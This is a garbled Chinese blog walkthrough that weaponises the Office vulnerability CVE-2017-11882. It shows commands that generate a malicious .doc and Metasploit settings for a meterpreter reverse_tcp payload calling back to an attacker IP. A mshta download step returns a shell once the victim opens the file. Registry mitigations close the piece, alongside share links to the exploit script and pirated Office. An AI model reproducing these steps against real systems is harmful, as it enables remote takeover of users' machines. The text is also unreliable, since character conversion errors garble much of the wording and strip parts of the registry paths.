在此轻巧说下那几个漏洞的复现和应用进程

图片 7

CVE-2017-11882尾巴使用

新式Office的CVE-2017-11882的poc刚刚发布出去,令人近年来一亮,完美无弹窗,无视宏,影响Ms
offcie全版本,对于集团来讲风险相当的大。在那轻巧说下这几个漏洞的复现和利用进度。

 

 

POC地址:

下载Command43b_CVE-2017-11882.py脚本文本(文末共享云盘链接卡塔 尔(阿拉伯语:قطر‎。

 

应用的点子超级轻便,实施上边谈笑风生,生成漏洞doc文件。

 

python Command_CVE-2017-11882.py -c
“cmd.exe /c calc.exe” -o test.doc

 

图片 1

 

 

行使office
二〇一一开垦,直接施行。

 

图片 2

 

 

 

 

关于怎么更加的行使,能够使用msf举办抨击。

 

此地有个小手艺,因为命令长度有43字符的范围,能够行使U奇骏IPATH设置路线,尽量短一点,制止加起来超越43字符。

此地本身细心说一下,希望各类人都能看懂。

 

预备阶段:

kali:192.168.104

win7:192.168.1.132

win7里面包车型地铁doc文件能够用office张开。我的win7虚构机用的是office2013(文末共享卡塔尔国

 

图片 3

 图片 4

 

首先张开kali,查看
IP,能够看出小编的设想机kali的
IP是192.168.1.104。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就足以。接下来将要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一块吧。

ms17-010.rb文件的路线是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一起。

策画职业做好了,接下去就是msf上场了。

输入msfconsole,然后reload_all,重新加载全体模块。

接下去输入指令:search PS_shell

use /exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.104

set uripath abc

exploit

会出现 started reverse tcp hander on 192.168.1.104:4444

using url,local ip,,,

mshta.exe “”

 

接下去就到了 Command43b_CVE-2017-11882.py
上场了。

日前聊起,大家是把py文件放 kali
桌面的,所以在 kali 推行的时候路线要介怀。

cd Desktop

输入指令:python Command43b_CVE-2017-11882.py -c “mshta
” -o test.doc

会在同目录生成 test.doc 文件。

接下来复制到 win7里面用 office二零一三打开。

win7 张开的时候,msf 输入 sessions

成功再次来到 shell。

现实请看截图,至此CVE-2017-11882尾巴使用结束,下边还能实行一花样好多渗透了。

 

图片 5

 图片 6

 图片 7

 

 

 

 

修复方案:

1.下载微软对此漏洞补丁:

2.在注册表中禁用该漏洞模块

reg add
“HKLMSOFTWAREMicrosoftOfficeXX.XCommonCOM
Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility
Flags” /t REG_DWORD /d 0x400

reg add
“HKLMSOFTWAREWow6432NodeMicrosoftOfficeXX.XCommonCOM
Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility
Flags” /t REG_DWORD/d 0x400

 

 

 

Command43b_CVE-2017-11882.py:(链接:
密码: 5ap6)

PS_shell.rb:(链接:
密码: rkwy)

office2013:(链接:
密码: q66f)

正文链接(

首要!